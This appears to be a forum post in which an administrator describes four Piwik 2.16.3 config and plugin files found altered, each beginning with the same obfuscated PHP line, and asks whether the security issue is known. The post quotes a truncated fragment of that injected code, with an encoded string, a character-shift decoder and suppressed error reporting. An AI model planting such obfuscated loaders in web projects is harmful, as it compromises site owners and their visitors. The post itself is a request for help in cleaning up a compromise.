Hi folks. One of my customer called me to fix the following problem:
What I found was, four changed INI files.
- config/config.ini.php
- plugins/PiwikPro/config/test.php
- plugins/MobileAppMeasurable/config/test.php
- plugins/CorePluginsAdmin/config/config.php
Every INI file has the same first “unusual” line:
<?php $ozwnijtsn = '75]D:M8]Df#<%tdz>#L4]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*cvpbbyz($n){return chr(ord($n)-1);} @error_reporbq}k;opjudovg}x;0]=])..... The piwik installation version was 2.16.3. My question is, does anyone know this security issue because I didn't find any advice? My solution to fix the problem was, to reinstall the whole piwik with an actual version. I am thankful for every hint!